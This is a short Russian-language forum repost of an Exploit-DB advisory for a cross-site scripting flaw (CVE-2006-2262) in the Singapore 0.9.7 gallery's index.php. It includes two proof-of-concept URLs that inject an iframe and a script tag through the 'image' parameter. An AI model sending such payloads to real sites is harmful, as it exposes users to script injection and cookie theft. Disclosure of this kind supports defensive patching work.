Exploit Singapore 0.9.7 - 'index.php' Cross-Site Scripting

Exploiter

Хакер
34,599
0
18 Дек 2022
EDB-ID
27824
Проверка EDB
  1. Пройдено
Автор
[email protected]
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2006-2262
Дата публикации
2006-05-08
Код:
source: https://www.securityfocus.com/bid/17874/info

The 'singapore' application is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/images/index.php?gallery=[gallery name]&image=<iframe%20src="http://www.example.com">
http://www.example.com/images/index.php?gallery=[gallery name]&image=<script>alert("lol")<script>
 
Источник
www.exploit-db.com

Похожие темы